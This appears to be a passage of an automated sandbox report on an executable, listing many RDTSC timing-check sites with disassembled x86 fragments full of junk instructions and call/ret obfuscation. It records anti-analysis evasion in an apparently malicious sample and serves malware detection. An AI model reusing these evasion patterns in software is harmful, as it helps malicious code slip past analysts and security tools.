                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBBD5 second address: CBBBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA4A second address: CBEA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA50 second address: CBEA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDCA6 second address: CBDCD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F6074F51217h 0x0000000f pushad 0x00000010 jmp 00007F6074F51209h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEA54 second address: CBEAC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D233Bh], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F6074D9F9E8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push eax 0x00000031 mov di, F403h 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F6074D9F9E8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov dword ptr [ebp+12454F23h], edx 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEAC4 second address: CBEAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDD81 second address: CBDD8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEAC9 second address: CBEADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F6074F511F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEADD second address: CBEAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6074D9F9E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A24 second address: CC0A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A33 second address: CC0A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6074D9F9F5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0A60 second address: CC0ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D1F1Ah] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6074F511F8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a jmp 00007F6074F51201h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F6074F511F8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movzx edi, di 0x0000004e push eax 0x0000004f jbe 00007F6074F51200h 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 pop esi 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC19AF second address: CC1A0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 754A12E0h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F6074D9F9E8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 add edi, dword ptr [ebp+122D2C10h] 0x0000002f push 00000000h 0x00000031 jl 00007F6074D9FA01h 0x00000037 js 00007F6074D9F9FBh 0x0000003d jmp 00007F6074D9F9F5h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1A0B second address: CC1A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC39F2 second address: CC39F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC39F7 second address: CC3A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F6074F511F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3FED second address: CC3FF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3FF7 second address: CC4002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6074F511F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4FCA second address: CC4FEE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F6074D9F9ECh 0x00000010 jnc 00007F6074D9F9E6h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jnp 00007F6074D9F9E8h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7F3F second address: CC7FAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F6074F511F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6074F51204h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F6074F511F8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D1A48h], edx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F6074F511F8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push 00000000h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007F6074F511FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7FAF second address: CC7FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB5FB second address: CCB601 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0962 second address: CD0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0386 second address: CD039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6074F511FFh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD039C second address: CD03D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6074D9F9F2h 0x0000000e jmp 00007F6074D9F9ECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E81 second address: CD7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E85 second address: CD7E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7E95 second address: CD7E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8038 second address: CD807D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F6074D9F9EBh 0x00000011 ja 00007F6074D9F9E8h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F6074D9F9F9h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD807D second address: CD8081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8081 second address: CD8087 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8087 second address: CD809F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074F51203h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCBD6 second address: CDCC16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F6074D9FA04h 0x0000000f jmp 00007F6074D9F9F3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC16 second address: CDCC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6074F51201h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB9AB second address: CDB9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB9B1 second address: CDB9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC33F second address: CDC345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC62B second address: CDC639 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC639 second address: CDC63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC63F second address: CDC655 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6074F511F6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC655 second address: CDC659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0F6F second address: CE0F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6074F511F6h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F6074F511FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0F8A second address: CE0F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10B6 second address: CE10D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6074F511F6h 0x00000008 jnl 00007F6074F511F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F6074F511FAh 0x00000016 push eax 0x00000017 pop eax 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10D6 second address: CE10DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10DC second address: CE10E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE10E0 second address: CE10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6074D9F9EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1251 second address: CE1257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1257 second address: CE1265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6074D9F9EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1265 second address: CE126B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13AD second address: CE13B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13B1 second address: CE13BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6074F511F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE13BB second address: CE13CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jp 00007F6074D9F9EEh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93D7C second address: C93D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93D80 second address: C93DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6074D9F9F3h 0x00000010 ja 00007F6074D9F9E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DA4 second address: C93DB2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DB2 second address: C93DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93DB8 second address: C93DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B815 second address: C6B831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B831 second address: C6B835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B835 second address: C6B864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6074D9F9E8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jnp 00007F6074D9F9E6h 0x00000015 jnp 00007F6074D9F9E6h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F6074D9F9ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6222 second address: CE6226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6226 second address: CE622C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE622C second address: CE6233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB45B8 second address: CB4642 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor cx, 7366h 0x0000000f lea eax, dword ptr [ebp+1248A336h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F6074D9F9E8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dh, 62h 0x00000031 add edi, dword ptr [ebp+122D1C66h] 0x00000037 nop 0x00000038 jmp 00007F6074D9F9F3h 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F6074D9F9F7h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F6074D9F9F9h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4642 second address: C93211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dx, di 0x0000000b call dword ptr [ebp+122D1E0Fh] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47F5 second address: CB47FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4C24 second address: CB4C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4DC6 second address: CB4DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F6074D9F9E8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 or dword ptr [ebp+1247D658h], esi 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jnc 00007F6074D9F9E8h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4DFF second address: CB4E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F6074F511F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6074F51208h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4E29 second address: CB4E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4F2B second address: CB4F30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB501C second address: CB5022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5022 second address: CB5039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5039 second address: CB503D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB503D second address: CB5047 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB517C second address: CB5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5182 second address: CB5187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56C8 second address: CB56CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56CD second address: CB56E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6074F511F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB56E1 second address: CB56EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB58F5 second address: CB5962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F6074F511FEh 0x00000011 jc 00007F6074F511F8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6074F511F8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 cmc 0x00000035 lea eax, dword ptr [ebp+1248A37Ah] 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F6074F511F8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 